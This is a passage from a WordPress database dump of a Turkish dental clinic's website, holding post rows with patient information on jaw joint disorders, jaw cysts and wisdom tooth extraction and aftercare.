açmada güçlük ve ağrı</li>\r\n 	<li>Esnemede zorluk</li>\r\n 	<li>Kulak ağrıları</li>\r\n 	<li>Kulaklarda çınlama, gürleme benzeri sesler</li>\r\n 	<li>Üst ve alt dişlerimizin birleşme şeklinde ani değişiklik</li>\r\n 	<li>Yüz kaslarındaki hiperplaziye bağlı olabilecek yüzde asimetri</li>\r\n 	<li>Ağız açma sırasında çenede deviasyon (kayma)</li>\r\n 	<li>Kulakta tıkanma hissi ve basınç</li>\r\n</ul>\r\nTME’de diskin deplasmanı ya da kondil ve diskte dejeneratif değişiklikler de oluşabilir. TME’deki klinik semptomlardaki farklılıklar her zaman disk deplasmanı olarak açıklanamaz. Çiğneme kaslarının disfonksiyonu da hesaba katılmalıdır.\r\n\r\n<strong>TME bozukluklarının nedenleri</strong>\r\n<ul>\r\n 	<li>Çenelere yada eklem bölgesine gelen direkt travma (kaza ya da darbe sonucu)</li>\r\n 	<li>Tek taraflı çiğneme alışkanlığı</li>\r\n 	<li>Diş eksiklikleri</li>\r\n 	<li>Diş sıkma ve gıcırdatma</li>\r\n 	<li>Stres, depresyon vs.</li>\r\n 	<li>Fizyolojik olmayan diş kapanışı</li>\r\n 	<li>Eklemin gelişimsel defektleri( hipoplaziler vs.)</li>\r\n 	<li>Dejeneratif eklem rahatsızlıkları, osteoartritis, artrozis</li>\r\n 	<li>Otoimmün hastalıklar, romatoid artrit, lupus</li>\r\n 	<li>Bilinmeyen faktörler</li>\r\n</ul>\r\n<strong>TME bozukluklarının teşhis ve tedavisi</strong>\r\n\r\nÇene eklemi bozukluklarında teşhis için muayene ile birlikte bazı yardımcı testler kullanılabilir. Ayrıca geleneksel veya bilgisayarlı tomografi ve manyetik rezonans görüntüleme de sıklıkla kullanılan görüntüleme yöntemleridir. Nadiren sintigrafi veya PET tetkikleri gerekebilir.\r\n\r\n<strong>Muayene yöntemleri</strong>\r\n<ul>\r\n 	<li>Dişler ve kapanış sisteminin muayenesi,</li>\r\n 	<li>Çiğneme kaslarının muayenesi,</li>\r\n 	<li>Çene ekleminin muayenesi.</li>\r\n</ul>\r\n<strong>TME tedavisi</strong>\r\n<ul>\r\n 	<li>Semptomların tedavisi,</li>\r\n 	<li>Altta yatan nedenin tedavisi,</li>\r\n 	<li>Hazırlayıcı faktörlerin ortadan kaldırılması,</li>\r\n 	<li>Patolojik etkilerin tedavisi.</li>\r\n</ul>\r\n<strong>Tedavi seçenekleri</strong>\r\n<ul>\r\n 	<li>Hasta eğitimi ve koruyucu tedavi,</li>\r\n 	<li>Splint tedavisi,</li>\r\n 	<li>İlaç tedavisi,</li>\r\n 	<li>Egzersizler,</li>\r\n 	<li>Fizik tedavi,</li>\r\n 	<li>Manipülasyon,</li>\r\n 	<li>Psikiyatrik destek,</li>\r\n 	<li>Geç kalınmış vakalarda ileri tedaviler (cerrahi vs.)…</li>\r\n</ul>\r\n<strong>Tedavi sürecinde;</strong>\r\n<ul>\r\n 	<li>Eklemler üzerindeki yükün azaltılması çok önemlidir. Hastanın stresten uzaklaştırılması gerekir.</li>\r\n 	<li>Sakız çiğnenmesi, çeneyi yoracak sert gıdalar yenmesi yasaktır.</li>\r\n 	<li>Esnerken, hapşırırken ağız aşırı açılmamalı, çene elle desteklenmelidir.</li>\r\n 	<li>Isırma hareketi kesinlikle yasaktır, besinler küçük parçalar halinde ağza alınır.</li>\r\n 	<li>Tek taraflı çiğneme yapılmamalıdır, besinler her iki tarafta da çiğnenmelidir.</li>\r\n 	<li>Ağrının çok olduğu durumlarda, doktora başvurma sürecine kadar; ağrı kesici, kas gevşetici ve antienflamatuar ilaçlara başvurulabilir.</li>\r\n</ul>\r\n<strong>Tedavi sürecinin sonunda;</strong>\r\n<ul>\r\n 	<li>Erken ve patolojik tüberkül temasları düzeltilir.</li>\r\n 	<li>Kapanış kontrol edilir, gerekiyorsa hasta ortodonti bölümüne sevk edilir.</li>\r\n 	<li>Diş eksiklikleri varsa protetik tedaviler yoluyla giderilir ve nötral bir kapanış sağlanır.</li>\r\n 	<li>Diş sıkma veya gıcırdatma devam ediyorsa, psikiyatri konsültasyonu istenir.</li>\r\n</ul>\r\n<strong>Ancak;</strong> bu tamamlayıcı tedaviler sonucunda, tedavi süreci tam başarıyla sonuçlandırılabilir.\r\n\r\nSon olarak, unutulmamalıdır ki; TME disfonksiyonlarının tedavisi, öncelikle hasta uyumu olmak üzere, mültidisipliner bir yaklaşımı gerekli kılar. TME uzmanının uygulayacağı tedaviyle birlikte, fizik tedavi uzmanı, psikiyatrist, nörolog konsültasyonunu da gerektirebilir.[/vc_column_text][/vc_column][/vc_row]', 'T.M.E. Çene Eklemi', '', 'publish', 'closed', 'closed', '', 't-m-e-cene-eklemi', '', '', '2018-07-16 13:58:26', '2018-07-16 10:58:26', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6390', 0, 'us_portfolio', '', 0),
(6391, 1, '2018-07-16 13:55:34', '2018-07-16 10:55:34', '', 'cene-eklem', '', 'inherit', 'closed', 'closed', '', 'cene-eklem', '', '', '2018-07-16 13:55:34', '2018-07-16 10:55:34', '', 6390, 'http://www.ze-dent.com/wp-content/uploads/2018/07/cene-eklem.jpg', 0, 'attachment', 'image/jpeg', 0),
(6392, 1, '2018-07-16 13:58:26', '2018-07-16 10:58:26', '[vc_row][vc_column][vc_column_text]<strong>Temporomandibuler Eklem (Alt Çene Eklemi) Bozuklukları</strong>\r\n\r\nTemporomandibuler Eklem (TME, Alt çene eklemi) çiğneme kaslarını tutan ağrı ve fonksiyon bozukluğu sendromudur. Eklem yüzeyi ve disk arasındaki uyum bozulmuştur. Çene eklemi bozuklukları, günümüzde yaygın bir kesimi etkisi altına almış durumdadır.\r\n\r\n<strong>TME bozukluklarının belirtileri:</strong>\r\n<ul>\r\n 	<li>Ağız açma sırasında ağrı</li>\r\n 	<li>Ağız açıp kapatırken gıcırdama, klik, tıkırtı sesi</li>\r\n 	<li>Ağız açmada kısıtlılık veya kilitlenme</li>\r\n 	<li>Boyunda ağrı veya sertlik</li>\r\n 	<li>Baş ağrısı (Migren ağrısı ile karıştırılır)</li>\r\n 	<li>Çiğneme sırasında ağrı</li>\r\n 	<li>Yüzde ağrı</li>\r\n 	<li>Dişleri birbiri üstüne kapatırken ağrı</li>\r\n 	<li>Çiğneme sırasında çenede yorgunluk hissi</li>\r\n 	<li>Genellikle sabahları kalkınca çeneyi açmada güçlük ve ağrı</li>\r\n 	<li>Esnemede zorluk</li>\r\n 	<li>Kulak ağrıları</li>\r\n 	<li>Kulaklarda çınlama, gürleme benzeri sesler</li>\r\n 	<li>Üst ve alt dişlerimizin birleşme şeklinde ani değişiklik</li>\r\n 	<li>Yüz kaslarındaki hiperplaziye bağlı olabilecek yüzde asimetri</li>\r\n 	<li>Ağız açma sırasında çenede deviasyon (kayma)</li>\r\n 	<li>Kulakta tıkanma hissi ve basınç</li>\r\n</ul>\r\nTME’de diskin deplasmanı ya da kondil ve diskte dejeneratif değişiklikler de oluşabilir. TME’deki klinik semptomlardaki farklılıklar her zaman disk deplasmanı olarak açıklanamaz. Çiğneme kaslarının disfonksiyonu da hesaba katılmalıdır.\r\n\r\n<strong>TME bozukluklarının nedenleri</strong>\r\n<ul>\r\n 	<li>Çenelere yada eklem bölgesine gelen direkt travma (kaza ya da darbe sonucu)</li>\r\n 	<li>Tek taraflı çiğneme alışkanlığı</li>\r\n 	<li>Diş eksiklikleri</li>\r\n 	<li>Diş sıkma ve gıcırdatma</li>\r\n 	<li>Stres, depresyon vs.</li>\r\n 	<li>Fizyolojik olmayan diş kapanışı</li>\r\n 	<li>Eklemin gelişimsel defektleri( hipoplaziler vs.)</li>\r\n 	<li>Dejeneratif eklem rahatsızlıkları, osteoartritis, artrozis</li>\r\n 	<li>Otoimmün hastalıklar, romatoid artrit, lupus</li>\r\n 	<li>Bilinmeyen faktörler</li>\r\n</ul>\r\n<strong>TME bozukluklarının teşhis ve tedavisi</strong>\r\n\r\nÇene eklemi bozukluklarında teşhis için muayene ile birlikte bazı yardımcı testler kullanılabilir. Ayrıca geleneksel veya bilgisayarlı tomografi ve manyetik rezonans görüntüleme de sıklıkla kullanılan görüntüleme yöntemleridir. Nadiren sintigrafi veya PET tetkikleri gerekebilir.\r\n\r\n<strong>Muayene yöntemleri</strong>\r\n<ul>\r\n 	<li>Dişler ve kapanış sisteminin muayenesi,</li>\r\n 	<li>Çiğneme kaslarının muayenesi,</li>\r\n 	<li>Çene ekleminin muayenesi.</li>\r\n</ul>\r\n<strong>TME tedavisi</strong>\r\n<ul>\r\n 	<li>Semptomların tedavisi,</li>\r\n 	<li>Altta yatan nedenin tedavisi,</li>\r\n 	<li>Hazırlayıcı faktörlerin ortadan kaldırılması,</li>\r\n 	<li>Patolojik etkilerin tedavisi.</li>\r\n</ul>\r\n<strong>Tedavi seçenekleri</strong>\r\n<ul>\r\n 	<li>Hasta eğitimi ve koruyucu tedavi,</li>\r\n 	<li>Splint tedavisi,</li>\r\n 	<li>İlaç tedavisi,</li>\r\n 	<li>Egzersizler,</li>\r\n 	<li>Fizik tedavi,</li>\r\n 	<li>Manipülasyon,</li>\r\n 	<li>Psikiyatrik destek,</li>\r\n 	<li>Geç kalınmış vakalarda ileri tedaviler (cerrahi vs.)…</li>\r\n</ul>\r\n<strong>Tedavi sürecinde;</strong>\r\n<ul>\r\n 	<li>Eklemler üzerindeki yükün azaltılması çok önemlidir. Hastanın stresten uzaklaştırılması gerekir.</li>\r\n 	<li>Sakız çiğnenmesi, çeneyi yoracak sert gıdalar yenmesi yasaktır.</li>\r\n 	<li>Esnerken, hapşırırken ağız aşırı açılmamalı, çene elle desteklenmelidir.</li>\r\n 	<li>Isırma hareketi kesinlikle yasaktır, besinler küçük parçalar halinde ağza alınır.</li>\r\n 	<li>Tek taraflı çiğneme yapılmamalıdır, besinler her iki tarafta da çiğnenmelidir.</li>\r\n 	<li>Ağrının çok olduğu durumlarda, doktora başvurma sürecine kadar; ağrı kesici, kas gevşetici ve antienflamatuar ilaçlara başvurulabilir.</li>\r\n</ul>\r\n<strong>Tedavi sürecinin sonunda;</strong>\r\n<ul>\r\n 	<li>Erken ve patolojik tüberkül temasları düzeltilir.</li>\r\n 	<li>Kapanış kontrol edilir, gerekiyorsa hasta ortodonti bölümüne sevk edilir.</li>\r\n 	<li>Diş eksiklikleri varsa protetik tedaviler yoluyla giderilir ve nötral bir kapanış sağlanır.</li>\r\n 	<li>Diş sıkma veya gıcırdatma devam ediyorsa, psikiyatri konsültasyonu istenir.</li>\r\n</ul>\r\n<strong>Ancak;</strong> bu tamamlayıcı tedaviler sonucunda, tedavi süreci tam başarıyla sonuçlandırılabilir.\r\n\r\nSon olarak, unutulmamalıdır ki; TME disfonksiyonlarının tedavisi, öncelikle hasta uyumu olmak üzere, mültidisipliner bir yaklaşımı gerekli kılar. TME uzmanının uygulayacağı tedaviyle birlikte, fizik tedavi uzmanı, psikiyatrist, nörolog konsültasyonunu da gerektirebilir.[/vc_column_text][/vc_column][/vc_row]', 'T.M.E. Çene Eklemi', '', 'inherit', 'closed', 'closed', '', '6390-revision-v1', '', '', '2018-07-16 13:58:26', '2018-07-16 10:58:26', '', 6390, 'http://www.ze-dent.com/6390-revision-v1/', 0, 'revision', '', 0),
(6393, 1, '2018-07-16 13:59:02', '2018-07-16 10:59:02', ' ', '', '', 'publish', 'closed', 'closed', '', '6393', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6393', 11, 'nav_menu_item', '', 0),
(6394, 1, '2018-07-16 14:05:40', '2018-07-16 11:05:40', '[vc_row][vc_column][vc_column_text]<strong>Kist, Kistlerin oluşumu ve zararları</strong>\r\nKist, merkezden çevreye genişleyerek büyüyen, çeper ile çevrili patolojik bir boşluktur.\r\nKistlerin büyürken oluşturdukları başınç komşu dişlerin köklerinde rezorpsiyonuna neden olur, çok fazla büyüyen kistlerde komşu dişlerin kaybı görülebilir.\r\n\r\n<strong>Kistlerin oluşumu ve zararları;</strong>\r\n\r\nKistler, embriyolojik gelişim sürecinde dokular içine yerleşen hücre artıklarından gelişebildikleri gibi, enfekte kök kanalından gelişen irritasyon sonucu kök ucu bölgesinde meydana gelen patolojik değişiklikler ile de gelişebilirler. Ayrıca kök ucunda kistik lezyonu bulunan dişlerin çekimi sonrası çene kemiği içinde bu lezyonun kalması sonucunda da oluşabilirler.\r\n<ul>\r\n 	<li>Gömük bir dişin sebep olduğu kistik lezyon vakaları gözlenmiştir.</li>\r\n 	<li>Kistik lezyonlar kemik yıkımına, çene kemiğinde kendiliğinden oluşan kırıklara ve çevredeki dişlerin yer değiştirmesine ya da zarar görmesine sebep olur. Kemik yıkımını önlemek için diş çekilmeli ve kist temizlenmelidir.</li>\r\n 	<li>Nadiren bu kist çok geniş alanlara yayılırsa tümörlere dönüşebilir ve çene kemiğinde kendiliğinden kırıklara sebep olabilir.</li>\r\n</ul>\r\n<strong>Kist Ameliyatları</strong>\r\n\r\nKist ameliyatlarında temel ilke tüm kistin çeperi ile birlikte çıkarılmasıdır. Kist lezyonu ile ilişkili olmayan komşu diş kökleri korunmalı ve kist içerisinde bulunan dişlerin apikal rezeksiyon yöntemi ağız içerisinde kalması sağlanmalıdır.\r\n\r\nBazı kist tiplerinde kistin kendi oluşturduğu basınçla ittiği ve gömük kalan dişlerin sürmesini (çıkmasını) sağlamak amacıyla kist içerisine diren yerleştirilir. Bu diren her hafta değiştirilerek kist içindeki basıncın azaltılmasını, kist çevresinde yeni kemik oluşumunu ve gömük kalan dişlerin sürmesini sağlar.\r\n\r\nKist tedavisinin fonksiyonel veya estetik sorunlara yol açmaması gereklidir. Bu nedenle büyük kist boşluklarının uygun kemik greftleri (kemik tozu) ve membranlar(bariyer) ile rekonstrüksiyonu gereklidir.[/vc_column_text][/vc_column][/vc_row]', 'Kist Operasyonları', '', 'publish', 'closed', 'closed', '', 'kist-operasyonlari', '', '', '2018-07-16 14:05:40', '2018-07-16 11:05:40', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6394', 0, 'us_portfolio', '', 0),
(6395, 1, '2018-07-16 14:05:21', '2018-07-16 11:05:21', '', 'kist-operasyonu', '', 'inherit', 'closed', 'closed', '', 'kist-operasyonu', '', '', '2018-07-16 14:05:21', '2018-07-16 11:05:21', '', 6394, 'http://www.ze-dent.com/wp-content/uploads/2018/07/kist-operasyonu.jpg', 0, 'attachment', 'image/jpeg', 0),
(6396, 1, '2018-07-16 14:05:40', '2018-07-16 11:05:40', '[vc_row][vc_column][vc_column_text]<strong>Kist, Kistlerin oluşumu ve zararları</strong>\r\nKist, merkezden çevreye genişleyerek büyüyen, çeper ile çevrili patolojik bir boşluktur.\r\nKistlerin büyürken oluşturdukları başınç komşu dişlerin köklerinde rezorpsiyonuna neden olur, çok fazla büyüyen kistlerde komşu dişlerin kaybı görülebilir.\r\n\r\n<strong>Kistlerin oluşumu ve zararları;</strong>\r\n\r\nKistler, embriyolojik gelişim sürecinde dokular içine yerleşen hücre artıklarından gelişebildikleri gibi, enfekte kök kanalından gelişen irritasyon sonucu kök ucu bölgesinde meydana gelen patolojik değişiklikler ile de gelişebilirler. Ayrıca kök ucunda kistik lezyonu bulunan dişlerin çekimi sonrası çene kemiği içinde bu lezyonun kalması sonucunda da oluşabilirler.\r\n<ul>\r\n 	<li>Gömük bir dişin sebep olduğu kistik lezyon vakaları gözlenmiştir.</li>\r\n 	<li>Kistik lezyonlar kemik yıkımına, çene kemiğinde kendiliğinden oluşan kırıklara ve çevredeki dişlerin yer değiştirmesine ya da zarar görmesine sebep olur. Kemik yıkımını önlemek için diş çekilmeli ve kist temizlenmelidir.</li>\r\n 	<li>Nadiren bu kist çok geniş alanlara yayılırsa tümörlere dönüşebilir ve çene kemiğinde kendiliğinden kırıklara sebep olabilir.</li>\r\n</ul>\r\n<strong>Kist Ameliyatları</strong>\r\n\r\nKist ameliyatlarında temel ilke tüm kistin çeperi ile birlikte çıkarılmasıdır. Kist lezyonu ile ilişkili olmayan komşu diş kökleri korunmalı ve kist içerisinde bulunan dişlerin apikal rezeksiyon yöntemi ağız içerisinde kalması sağlanmalıdır.\r\n\r\nBazı kist tiplerinde kistin kendi oluşturduğu basınçla ittiği ve gömük kalan dişlerin sürmesini (çıkmasını) sağlamak amacıyla kist içerisine diren yerleştirilir. Bu diren her hafta değiştirilerek kist içindeki basıncın azaltılmasını, kist çevresinde yeni kemik oluşumunu ve gömük kalan dişlerin sürmesini sağlar.\r\n\r\nKist tedavisinin fonksiyonel veya estetik sorunlara yol açmaması gereklidir. Bu nedenle büyük kist boşluklarının uygun kemik greftleri (kemik tozu) ve membranlar(bariyer) ile rekonstrüksiyonu gereklidir.[/vc_column_text][/vc_column][/vc_row]', 'Kist Operasyonları', '', 'inherit', 'closed', 'closed', '', '6394-revision-v1', '', '', '2018-07-16 14:05:40', '2018-07-16 11:05:40', '', 6394, 'http://www.ze-dent.com/6394-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6397, 1, '2018-07-16 14:13:02', '2018-07-16 11:13:02', '[vc_row][vc_column][vc_column_text]<strong>20’lik dişler (20 yaş dişleri)</strong>\r\n\r\n20’lik dişler ağızda en son süren ve ağız sağlığı açısından en az öneme sahip dişlerdir. Bu dişler 3. büyük azılardır. ‘20 yaş dişi’ olarak adlandırılmalarının nedeni 17-23 yaş arasında sürmeleridir.\r\nYaş ilerledikçe beslenme alışkanlıklarının değişmesiyle çene yapısı küçülür. Bu sebeple dişler, çenede rahat bir şekilde sürecek yer bulamazlar. Bu yer darlığı ve dişlerin çıkmaya eğilimi, 20 yaş dişleri problemlerini oluşturur.\r\nÇoğu insanda ağzın dört köşesinde birer adet olmak üzere toplam dört tane 20’lik diş bulunur. Genellikle diş etine veya kemik içerisine gömülü bulunurlar ya da yer darlığı yüzünden farklı yönlerde sürerler. Bunlar bir dizi probleme yol açtığından daha fazla sıkıntıya neden olmadan hekim kararıyla çekilmeleri gerekir.\r\n\r\n20’lik dişlerin çıkarılması için en uygun zaman 17 yaş civarıdır. Çünkü bu yaşlarda diş yeni oluşmaya başlamıştır ve kemik yetişkinlerdeki gibi sert olmadığı için ameliyatı kolaydır. Dişlerin kökleri tam olarak oluşmadığı için de iyileşme daha hızlı olacaktır.\r\n20’lik dişin yol açtığı sıkıntılar çeşitli faktörlere göre değişir. Çene boyutu ve dişin süreceği yön, problemin büyüklüğünde belirleyicidir. Belki hiçbir ağrı ve şikayet olmayabilir ama diğer dişler büyük risk altındadır.\r\n\r\n<strong>20’lik dişlerin yol açtığı problemler</strong>\r\nDişlerin değişik sürme şekillerini ve yol açtıkları problemleri öğrenirseniz ; neden çekilmeleri gerektiğini daha iyi anlayacaksınız.\r\n\r\n<strong>ÇÜRÜK:</strong> Tükürük, bakteri ve yiyecek parçacıkları yeni çıkmakta olan dişin açtığı yuvada birikerek hem yirmilik dişi hem de yanındaki azı dişini tehdit eder. Bu tip çürükleri fark etmek ve tedavi etmek oldukça zordur. Ağrı ve enfeksiyona yol açan ve apseyle sonuçlanan ağır tablolar meydana gelebiliyor.\r\n\r\n<strong>DİŞETİ HASTALIĞI (perikoronit):</strong> Kısmen çıkmış bir yirmilik dişin dişetinde bakteri ve yiyecek artıklarının depolandığı bir enfeksiyon odağı oluşur. Bu durum ağız kokusu, ağrı, ödem ve trismusa (ağzın tam açılamaması hali) sebep olur. Enfeksiyon lenfler aracılığı ile yanak ve boyuna yayılabilir. Yirmilik dişin etrafındaki bu enfeksiyona yatkın zemin her seferinde kolayca enfekte olmaya adaydır. (Bakınız, Dişeti hastalıkları)\r\n\r\n<strong>BASINÇ AĞRISI:</strong> Sürme sırasında komşu dişlere de basınç uygulanıyorsa sıkışmadan dolayı da bir ağrı hissedilebilir. Bazı durumlarda bu basınç aşınmaya yol açar.\r\n\r\n<strong>ORTODONTİK SEBEPLER:</strong> Pek çok genç birey dişlerindeki çapraşıklıkları düzeltmek için ortodontik tedavi görmektedir. Yirmi yaş dişlerinin sürme basınçları diğer dişlere de yansıyacağından diğer dişlerde de bir hareketlilik olur, çapraşıklıklar artabilir.\r\n\r\n<strong>PROTEZLE İLGİLİ SEBEPLER:</strong> Protez planlaması yapılan bir ağızda yirmilik dişleri hesaba katmak gerekir. Çünkü, yirmilik diş çekildikten sonra değişen ağız yapısına göre yeni bir protez yapmak gerekecektir.\r\n\r\n<strong>KİST OLUŞUMU:</strong> Gömülü bir dişin sebep olduğu kistik vakalar gözlenmiştir. Kist kemik yıkımına, çene genişlemesine ve çevredeki dişlerin yer değiştirmesine ya da zarar görmesine sebep olur. Kemik yıkımını önlemek için diş çekilmeli ve kist temizlenmelidir. Nadiren bu kist çok geniş alanlara yayılırsa tümörlere dönüşebilir veya çene kemiğinde kendiliğinden kırılmalara yol açabilir.\r\n\r\n20 lik dişlerin çıkarılması için en uygun zaman 17 yaş civarıdır. Çünkü bu senelerde bu diş yeni oluşmaya başlamış, kemik yetişkinlerdeki gibi sert olmadığı için ameliyatı kolaydır. Dişlerin kökleri tam olarak oluşmadığı için de iyileşme daha hızlı olacaktır.\r\n\r\n<strong>20’lik dişin çekim aşamaları</strong>\r\n20 lik diş ameliyatı dişsel ve genel sağlık durumunuzun değerlendirilmesiyle başlar. Dişi rahat bi şekilde değerlendirebilmek için genellikle röntgen alınır. Dişin durumuna göre büyük bir film, küçük bir film veya dijital bir film alınabilir. Diş ameliyatı genellikle diş hekimi muayenehanesinde yapılan bir işlemdir ancak çok komplike durumlarda ameliyatın çene cerrahı tarafından ameliyathane şartlarında yapılması uygun görülebilir. Ameliyatın tipi ve süresi tamamen dişin durumuna pozisyonuna bağlıdır. Genellikle işlem yarım saat ile birbuçuk saat arasında sürmektedir.\r\n\r\nEğer dişiniz büyük oranda sürmüşse sadece davye vasıtasıyla alınabilir. Kökler kemiğin içinde ayrık pozisyonda ve diş kemik içinde derinde ise; dişi parçalara ayırmak veya kemik kaldırmak gerekebilir.\r\n\r\nDişiniz gömülü ise dişe ulaşmak için dişetinde bir kesim yapılır. Dişeti ekarte edilir kemik ortaya çıkarılır. Diş kemiğin de içinde ise bir miktar kemik kaldırılır. Diş iyice ortaya çıkarılıp rahat bir çalışma alanı oluşturulduktan sonra diş bazen tek parça bazen de birkaç parçaya bölünerek çıkarılır.\r\n\r\n<strong>20’lik diş çekimi sonrası için tavsiyeler</strong>\r\n\r\n20’lik diş ameliyatı sonrasında bir süre gözlem altında tutulacaksınız. Kendinizi daha iyi hissettiğinizde doktorunuzun da onayıyla eve gidebilirsiniz. Genellikle ameliyatı takiben birkaç gün istirahat etmeniz uygundur. Ameliyat sonrası kontrol seansları gerekebilir. Kontrole geldiğinizde çekim boşluğunun nasıl iyileştiğine bakılır, varsa dikişler alınır, ağız sağlığınızın durumu değerlendirilir. Çekim sonrasında dikkat edilmesi gereken önemli detayların sıralamak gerekirse;\r\n<ul>\r\n 	<li>Çekimden sonra bir miktar kanama mutlaka olacaktır endişelenmeyin. Ağız içi yaralar çok hızlı iyileşir. Bunun sebebi vücudun o bölgeye fazlaca kan pompalamasıdır. Diş çekiminden sonra kanama olmasının sebebi de budur. Kanama olmazsa pıhtı oluşmaz, pıhtı oluşmazsa çekim boşluğu kapanamaz. Ağzınızı sık sık çalkalamanız ya da kanı sürekli tükürmeniz kan pıhtısını bozacaktır bunları yapmamaya dikkat edin ve kanı mümkün olduğunca yutmaya çalışın.</li>\r\n 	<li>Diş çekildikten sonra doktorunuz kanamayı durdurmak için bölgeye steril bir tampon yerleştirir. Bu tamponu 25 – 30 dakika ısırmalısınız. Kanama hala devam ediyorsa ikinci bir tamponu aynı süre için koyabilirsiniz.</li>\r\n 	<li>Anestezi etkisini kaybedene kadar uyuşmuş dil ve dudağı ısırmamaya dikkat edin.</li>\r\n 	<li>Ameliyattan hemen sonra çekim boşluğu içinde pıhtı oluşacağını söylemiştik. Yaklaşık 2 gün sonra da yumuşak doku (diş eti) çekim boşluğunun üzerini kapatmaya başlar. Sonraki aşama kemik oluşumudur; 2-3 ay içerisinde boşluk kemikle dolacaktır.</li>\r\n 	<li>Çekimden sonra 2 saat hiçbir şey yememeli ve içmemelisiniz. 2 gün boyunca sıcak gıdalar ve içecekler tüketmemelisiniz. Yara tam olarak iyileşene kadar yumuşak gıdalar tüketmeli, bol bol su içmelisiniz. İçecekleri pipetle içmemeli, karbonhidratlı içecekler ve alkol almamalısınız.</li>\r\n 	<li>Diş çekimi sonrası görülen en yaygın problem; çekim bölgesinde birkaç gün içinde başlayan ağrılardır. Bunu engellemek için çekim sonrası uyarılar kesinlikle dikkate alınmalıdır. Çekimden sonra hafif bir ağrı normaldir anestezi etkisi geçmeden aspirin harici bir ağrı kesici kullanabilirsiniz.</li>\r\n 	<li>Çekim sonrası antibiyotik, ağrı kesici veya gargara reçete edilmişse düzenli olarak kullanmalısınız.</li>\r\n 	<li>Gargara yapmak yaranın iyileşmesini hızlandıracaktır. Herhangi bir gargara reçete edilmediyse ılık tuzlu suyla gargara yapabilirsiniz. Gargarayı, 1 bardak suya 1 tatlı kaşığı tuz ekleyerek hazırlayabilirsiniz.</li>\r\n 	<li>Sigara içmeniz yara iyileşme sürecini bozacağından 24 saat boyunca kesinlikle sigara içmemelisiniz. Tavsiye edilen 3 gün sigara içmemektir. Ayrıca ilk gün mümkün olduğunca ağır fiziksel aktivitelerden kaçınmalısınız.</li>\r\n 	<li>Dikiş atıldıysa 1 hafta sonra dikişlerinizi aldırmalısınız. Zor çekimleri takiben şişliği önlemek için ilk 24 saat bölgeye 5 dakikalık aralıklarla soğuk uygulamayı unutmayın. 24 saatten sonra ise sıcak uygulayın. Genellikle şişlik 48 saat sürer.</li>\r\n 	<li>Çekim bölgesi hariç diğer dişleri düzenli fırçalamaya devam edin. 24 saat sonra çekim bölgesini de kibarca fırçalamaya başlayın.</li>\r\n 	<li>Dilinize takılan kemik kenarlarını kök zannedebilirsiniz ama endişelenmeyin, kliniğimizde hiçbir zaman çekim sonrası kök bırakılmaz. Çekim bittikten sonra doktorunuz tüm diş köklerini size gösterecektir. Aklınıza takılan soruları sormakta tereddüt etmeyin.</li>\r\n</ul>\r\nHerhangi bir rahatsızlığınızda lütfen bize danışın.[/vc_column_text][/vc_column][/vc_row]', '20 Yaş Diş Çekimleri', '', 'publish', 'closed', 'closed', '', '20-yas-dis-cekimleri', '', '', '2018-07-18 20:38:45', '2018-07-18 17:38:45', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6397', 0, 'us_portfolio', '', 0),
(6398, 1, '2018-07-16 14:12:38', '2018-07-16 11:12:38', '', '20-yas', '', 'inherit', 'closed', 'closed', '', '20-yas', '', '', '2018-07-16 14:12:38', '2018-07-16 11:12:38', '', 6397, 'http://www.ze-dent.com/wp-content/uploads/2018/07/20-yas.jpg', 0, 'attachment', 'image/jpeg', 0),
(6399, 1, '2018-07-16 14:13:02', '2018-07-16 11:13:02', '[vc_row][vc_column][vc_column_text]<strong>20’lik dişler (20 yaş dişleri)</strong>\r\n\r\n20’lik dişler ağızda en son süren ve ağız sağlığı açısından en az öneme sahip dişlerdir. Bu dişler 3. büyük azılardır. ‘20 yaş dişi’ olarak adlandırılmalarının nedeni 17-23 yaş arasında sürmeleridir.\r\nYaş ilerledikçe beslenme alışkanlıklarının değişmesiyle çene yapısı küçülür. Bu sebeple dişler, çenede rahat bir şekilde sürecek yer bulamazlar. Bu yer darlığı ve dişlerin çıkmaya eğilimi, 20 yaş dişleri problemlerini oluşturur.\r\nÇoğu insanda ağzın dört köşesinde birer adet olmak üzere toplam dört tane 20’lik diş bulunur. Genellikle diş etine veya kemik içerisine gömülü bulunurlar ya da yer darlığı yüzünden farklı yönlerde sürerler. Bunlar bir dizi probleme yol açtığından daha fazla sıkıntıya neden olmadan hekim kararıyla çekilmeleri gerekir.\r\n\r\n20’lik dişlerin çıkarılması için en uygun zaman 17 yaş civarıdır. Çünkü bu yaşlarda diş yeni oluşmaya başlamıştır ve kemik yetişkinlerdeki gibi sert olmadığı için ameliyatı kolaydır. Dişlerin kökleri tam olarak oluşmadığı için de iyileşme daha hızlı olacaktır.\r\n20’lik dişin yol açtığı sıkıntılar çeşitli faktörlere göre değişir. Çene boyutu ve dişin süreceği yön, problemin büyüklüğünde belirleyicidir. Belki hiçbir ağrı ve şikayet olmayabilir ama diğer dişler büyük risk altındadır.\r\n\r\n<strong>20’lik dişlerin yol açtığı problemler</strong>\r\nDişlerin değişik sürme şekillerini ve yol açtıkları problemleri öğrenirseniz ; neden çekilmeleri gerektiğini daha iyi anlayacaksınız.\r\n\r\n<strong>ÇÜRÜK:</strong> Tükürük, bakteri ve yiyecek parçacıkları yeni çıkmakta olan dişin açtığı yuvada birikerek hem yirmilik dişi hem de yanındaki azı dişini tehdit eder. Bu tip çürükleri fark etmek ve tedavi etmek oldukça zordur. Ağrı ve enfeksiyona yol açan ve apseyle sonuçlanan ağır tablolar meydana gelebiliyor.\r\n\r\n<strong>DİŞETİ HASTALIĞI (perikoronit):</strong> Kısmen çıkmış bir yirmilik dişin dişetinde bakteri ve yiyecek artıklarının depolandığı bir enfeksiyon odağı oluşur. Bu durum ağız kokusu, ağrı, ödem ve trismusa (ağzın tam açılamaması hali) sebep olur. Enfeksiyon lenfler aracılığı ile yanak ve boyuna yayılabilir. Yirmilik dişin etrafındaki bu 